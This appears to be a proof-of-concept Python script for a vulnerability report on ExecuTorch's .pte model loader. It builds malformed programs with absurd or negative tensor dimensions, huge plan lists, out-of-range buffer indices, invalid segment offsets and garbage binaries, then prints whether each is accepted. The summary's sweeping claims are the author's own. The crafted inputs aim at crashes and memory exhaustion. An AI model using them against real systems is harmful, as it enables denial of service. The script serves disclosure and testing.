| """ |
| PoC: ExecuTorch .pte Format Validation Bypass |
| =============================================== |
| Demonstrates that ExecuTorch's deserialize_pte_binary() performs no |
| structural validation on .pte model files before parsing them. |
| |
| Tested on: executorch 1.2.0, Python 3.12, Windows 11 |
| """ |
|
|
| import json |
| import os |
| import struct |
| import sys |
| import tempfile |
| import time |
|
|
# Report the version that is actually installed rather than a hard-coded
# string, so the banner cannot drift from the environment under test.
from importlib import metadata

try:
    executorch_version = metadata.version("executorch")
except metadata.PackageNotFoundError:
    # Keep the banner printable even when the distribution metadata is absent.
    executorch_version = "unknown (executorch distribution not found)"

print("=" * 70)
print("ExecuTorch .pte Format Validation Bypass PoC")
print(f"executorch version: {executorch_version}")
print("=" * 70)
|
|
| |
| |
| |
# --- PoC 1: tensor extents far larger than the backing buffer ---------------
print("\n[PoC 1] Extreme Tensor Dimensions via _json_to_program()")
print("-" * 50)

from executorch.exir._serialize._program import _json_to_program

# One FLOAT tensor whose two extents are both 2147483647 (2**31 - 1). The
# only constant buffer in the program holds a single byte.
_huge_tensor = {
    "scalar_type": "FLOAT",
    "storage_offset": 0,
    "sizes": [2147483647, 2147483647],
    "dim_order": [0, 1],
    "requires_grad": False,
    "layout": 0,
    "data_buffer_idx": 0,
    "allocation_info": None,
    "shape_dynamism": "STATIC",
    "val_type": "Tensor",
}
_huge_plan = {
    "name": "forward",
    "container_meta_type": {
        "encoded_inp_str": "",
        "encoded_out_str": "",
    },
    "values": [{"val": _huge_tensor, "val_type": "Tensor"}],
    "inputs": [],
    "outputs": [],
    "chains": [],
    "operators": [],
    "delegates": [],
    "non_const_buffer_sizes": [0],
}
crafted_json = json.dumps({
    "version": 1,
    "execution_plan": [_huge_plan],
    "constant_buffer": [{"storage": [0]}],
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []},
})

# Parse the crafted program and, if it is accepted, show how far the declared
# element count exceeds the storage that was actually supplied.
try:
    program = _json_to_program(crafted_json.encode("utf-8"))
    tensor_sizes = program.execution_plan[0].values[0].val.sizes
    total_elements = 1
    for extent in tensor_sizes:
        total_elements = total_elements * extent
    print(f" [VULNERABLE] Program accepted with tensor sizes: {tensor_sizes}")
    print(f" -> Total elements: {total_elements} (~{total_elements / 1e18:.1f} exa-elements)")
    print(f" -> Actual storage in buffer: {len(program.constant_buffer[0].storage)} byte(s)")
    # 4 is the byte width assumed for one FLOAT element.
    print(f" -> sizeof(float) * elements would require: {4 * total_elements / 1e18:.1f} exabytes")
    print(" -> No validation rejected these impossible dimensions!")
except Exception as e:
    print(f" [PROTECTED] {e}")
|
|
| |
# --- PoC 1 (continued): a tensor with 10000 dimensions ----------------------
# Every extent is 2; dim_order is the identity permutation of the same length.
_rank = 10000
_many_dims_tensor = {
    "scalar_type": "FLOAT",
    "storage_offset": 0,
    "sizes": [2] * _rank,
    "dim_order": list(range(_rank)),
    "requires_grad": False,
    "layout": 0,
    "data_buffer_idx": 0,
    "allocation_info": None,
    "shape_dynamism": "STATIC",
    "val_type": "Tensor",
}
crafted_json_many_dims = json.dumps({
    "version": 1,
    "execution_plan": [{
        "name": "forward",
        "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
        "values": [{"val": _many_dims_tensor, "val_type": "Tensor"}],
        "inputs": [],
        "outputs": [],
        "chains": [],
        "operators": [],
        "delegates": [],
        "non_const_buffer_sizes": [0],
    }],
    "constant_buffer": [{"storage": [0]}],
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []},
})

# Acceptance is reported together with the number of dimensions that came
# back from the parser.
try:
    program2 = _json_to_program(crafted_json_many_dims.encode("utf-8"))
    dim_count = len(program2.execution_plan[0].values[0].val.sizes)
    print(f" [VULNERABLE] Program accepted with {dim_count} tensor dimensions!")
except Exception as e:
    print(f" [PROTECTED - dim count] {e}")
|
|
|
|
| |
| |
| |
# --- PoC 2: unbounded list lengths -------------------------------------------
print("\n[PoC 2] Excessive List Sizes in Program Fields")
print("-" * 50)

# Number of (otherwise empty) execution plans placed in the crafted program.
N_EXECUTION_PLANS = 100000

crafted_json_massive = json.dumps({
    "version": 1,
    "execution_plan": [
        {
            "name": f"plan_{i}",
            "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
            "values": [],
            "inputs": [],
            "outputs": [],
            "chains": [],
            "operators": [],
            "delegates": [],
            "non_const_buffer_sizes": [],
        }
        for i in range(N_EXECUTION_PLANS)
    ],
    "constant_buffer": [],
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []},
})

try:
    # Encode before starting the clock so the timing covers only the parse,
    # and so the reported size is the real number of bytes handed to it.
    payload = crafted_json_massive.encode("utf-8")
    payload_mb = len(payload) / 1024 / 1024

    # perf_counter() is monotonic; time.time() can jump if the wall clock is
    # adjusted while the parse is running.
    start = time.perf_counter()
    program3 = _json_to_program(payload)
    elapsed = time.perf_counter() - start

    plan_count = len(program3.execution_plan)
    print(f" [VULNERABLE] Program accepted with {plan_count} execution plans")
    # The figure is the input size, not process memory, so label it as such.
    print(f" -> Deserialization took {elapsed:.2f}s, JSON payload size: ~{payload_mb:.1f} MB")
    print(" -> No limit on execution_plan count!")
except MemoryError:
    print(f" [PARTIAL] Memory error with {N_EXECUTION_PLANS} plans (resource exhaustion)")
except Exception as e:
    print(f" [Result] {type(e).__name__}: {str(e)[:100]}")
|
|
|
|
| |
| |
| |
# --- PoC 3: negative and zero tensor extents ---------------------------------
print("\n[PoC 3] Negative / Zero / Invalid Tensor Dimensions")
print("-" * 50)

# (sizes to inject, label used in the report)
test_dims = [
    ([0], "zero-dim"),
    ([-1], "negative-dim (-1)"),
    ([-100], "negative-dim (-100)"),
    ([1, -1, 1], "mixed negative"),
]

for dims, label in test_dims:
    crafted_json_invalid = json.dumps({
        "version": 1,
        "execution_plan": [{
            "name": "forward",
            "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
            "values": [{
                "val": {
                    "scalar_type": "FLOAT",
                    "storage_offset": 0,
                    "sizes": dims,
                    "dim_order": list(range(len(dims))),
                    "requires_grad": False,
                    "layout": 0,
                    "data_buffer_idx": 0,
                    "allocation_info": None,
                    "shape_dynamism": "STATIC",
                    "val_type": "Tensor",
                },
                "val_type": "Tensor",
            }],
            "inputs": [], "outputs": [], "chains": [],
            "operators": [], "delegates": [],
            "non_const_buffer_sizes": [0],
        }],
        "constant_buffer": [{"storage": [0]}],
        "backend_delegate_data": [],
        "segments": [],
        "constant_segment": {"segment_index": 0, "offsets": []},
    })
    try:
        p = _json_to_program(crafted_json_invalid.encode("utf-8"))
        parsed_sizes = p.execution_plan[0].values[0].val.sizes
        # Judge the parsed result, not the input: only a negative extent that
        # survived parsing is a finding. A zero extent describes an empty
        # tensor, which is legal, so accepting it is informational only.
        if any(extent < 0 for extent in parsed_sizes):
            print(f" [VULNERABLE] {label}: sizes={dims} accepted, parsed as {parsed_sizes}")
        else:
            print(f" [INFO] {label}: sizes={dims} accepted, parsed as {parsed_sizes} (no negative extent; zero-size dimensions are legal)")
    except Exception as e:
        print(f" [PROTECTED] {label}: rejected - {type(e).__name__}")
|
|
|
|
| |
| |
| |
# --- PoC 4: tensor referencing a buffer index that does not exist ------------
print("\n[PoC 4] Tensor-Buffer Size Mismatch")
print("-" * 50)

# The tensor asks for constant buffer 999 while constant_buffer is empty.
crafted_json_oob_buffer = json.dumps({
    "version": 1,
    "execution_plan": [{
        "name": "forward",
        "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
        "values": [{
            "val": {
                "scalar_type": "FLOAT",
                "storage_offset": 0,
                "sizes": [100, 100],
                "dim_order": [0, 1],
                "requires_grad": False,
                "layout": 0,
                "data_buffer_idx": 999,
                "allocation_info": None,
                "shape_dynamism": "STATIC",
                "val_type": "Tensor",
            },
            "val_type": "Tensor",
        }],
        "inputs": [], "outputs": [], "chains": [],
        "operators": [], "delegates": [],
        "non_const_buffer_sizes": [0],
    }],
    "constant_buffer": [],
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []},
})

try:
    p4 = _json_to_program(crafted_json_oob_buffer.encode("utf-8"))
    # Read both figures back from the parsed program so the verdict reflects
    # what the parser actually kept, not what was written into the JSON.
    buffer_idx = p4.execution_plan[0].values[0].val.data_buffer_idx
    buffer_count = len(p4.constant_buffer)
    if buffer_idx >= buffer_count:
        print(f" [VULNERABLE] Program accepted with data_buffer_idx={buffer_idx} but only {buffer_count} buffers exist")
        print(" -> Tensor references non-existent buffer, will crash at runtime")
    else:
        print(f" [PROTECTED] Parsed data_buffer_idx={buffer_idx} is within the {buffer_count} available buffers")
except Exception as e:
    print(f" [PROTECTED] {e}")
|
|
|
|
| |
| |
| |
# --- PoC 5: segment records with implausible offsets -------------------------
print("\n[PoC 5] Malicious Segment Offsets")
print("-" * 50)

# Three segment records: a small one at offset 0, one whose offset and size
# are both 999999999, and one with a negative offset.
_segment_records = [
    {"offset": 0, "size": 100},
    {"offset": 999999999, "size": 999999999},
    {"offset": -1, "size": 100},
]
_empty_plan = {
    "name": "forward",
    "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
    "values": [],
    "inputs": [],
    "outputs": [],
    "chains": [],
    "operators": [],
    "delegates": [],
    "non_const_buffer_sizes": [],
}
crafted_json_segments = json.dumps({
    "version": 1,
    "execution_plan": [_empty_plan],
    "constant_buffer": [],
    "backend_delegate_data": [],
    "segments": _segment_records,
    "constant_segment": {"segment_index": 0, "offsets": [0]},
})

# On acceptance, list every parsed segment. The per-segment tag only checks
# the sign of the offset; it does not compare against any data length.
try:
    p5 = _json_to_program(crafted_json_segments.encode("utf-8"))
    print(" [VULNERABLE] Program accepted with invalid segment offsets:")
    for index, seg in enumerate(p5.segments):
        if seg.offset >= 0:
            valid = "VALID"
        else:
            valid = "INVALID (negative)"
        print(f" Segment {index}: offset={seg.offset}, size={seg.size} [{valid}]")
except Exception as e:
    print(f" [PROTECTED] {e}")
|
|
|
|
| |
| |
| |
# --- PoC 6: informational note on recursion depth ----------------------------
print("\n[PoC 6] Recursion Depth via _json_to_dataclass")
print("-" * 50)

# Imported so the script still fails here if the helper is missing from the
# installed package; it is intentionally not called in this section.
from executorch.exir._serialize._dataclass import _json_to_dataclass  # noqa: F401

# This section only reports an observation. No call to _json_to_dataclass()
# is made, so nothing here can raise RecursionError and no nested fixture is
# needed; the three lines below are the section's entire output.
print(" [INFO] ExecuTorch schema does not have self-referential types,")
print(" [INFO] but _json_to_dataclass() would recurse without depth limit")
print(" [INFO] on attacker-controlled structures if schema changed.")
|
|
|
|
| |
| |
| |
# --- PoC 7: feeding garbage bytes to the binary loader -----------------------
print("\n[PoC 7] Empty or Malformed .pte Binary")
print("-" * 50)

from executorch.exir._serialize._program import deserialize_pte_binary

# (payload, text printed if accepted, tag printed if rejected)
_garbage_cases = (
    (b"", "Empty bytes accepted by deserialize_pte_binary()", "Empty bytes"),
    (bytes(100), "100 null bytes accepted by deserialize_pte_binary()", "Null bytes"),
)
for _blob, _accepted_text, _rejected_tag in _garbage_cases:
    try:
        deserialize_pte_binary(_blob)
        print(f" [VULNERABLE] {_accepted_text}")
    except Exception as e:
        print(f" [PROTECTED] {_rejected_tag}: {type(e).__name__}: {str(e)[:80]}")

# 16 bytes: a little-endian uint32 with value 8, the ASCII bytes "ET00", then
# eight zero bytes.
# NOTE(review): this looks like a FlatBuffers header (root offset followed by
# a 4-byte file identifier) — confirm "ET00" is the identifier intended here.
minimal_fb = struct.pack("<I4s8x", 8, b"ET00")
try:
    result = deserialize_pte_binary(minimal_fb)
    print(" [VULNERABLE] Minimal valid-ish flatbuffer accepted!")
    print(f" -> Program version: {result.program.version}")
    print(" -> No magic byte verification beyond what flatc does")
except Exception as e:
    print(f" [PARTIAL] Minimal flatbuffer: {type(e).__name__}: {str(e)[:100]}")
|
|
|
|
| |
| |
| |
# --- Summary -----------------------------------------------------------------
# The text below is static: it is printed as-is regardless of which verdicts
# the sections above produced.
_rule = "=" * 70
print("\n" + _rule)
print("SUMMARY")
print(_rule)

_summary_lines = [
    "",
    "Key findings for ExecuTorch .pte format:",
    "",
    "1. NO DIMENSION UPPER BOUND: Tensor sizes can be 2^31-1 or higher,",
    "accepted without validation. 10000-dimensional tensors accepted.",
    "",
    "2. NO LIST SIZE LIMITS: execution_plan, chains, operators, values etc.",
    "have no upper bounds — can cause OOM during deserialization.",
    "",
    "3. NEGATIVE/ZERO DIMS ACCEPTED: Negative and zero tensor dimensions",
    "pass through _json_to_dataclass() without rejection.",
    "",
    "4. BUFFER INDEX OOB: Tensors can reference non-existent buffer indices,",
    "causing runtime crashes.",
    "",
    "5. NO STRUCTURAL VALIDATION: deserialize_pte_binary() performs zero",
    "validation on the binary blob before parsing. No magic byte check,",
    "no size limits, no sanity checks.",
    "",
    "6. NO check_model() EQUIVALENT: The verifier only checks graph-level",
    "semantics (operator validity, tensor contiguity) and is OPTIONAL",
    "(controlled by _check_ir_validity flag).",
    "",
    "7. SEGMENT OFFSETS UNVALIDATED: Segment offsets can be negative or",
    "point past end of data — accepted without rejection.",
    "",
    "Compared to ONNX (check_model, shape inference) and TF SavedModel,",
    "ExecuTorch's loading pipeline is completely trusting of input data.",
    "",
]
# The leading and trailing empty entries reproduce the newline that follows
# the opening triple quote and the one that precedes the closing triple quote.
print("\n".join(_summary_lines))
|
|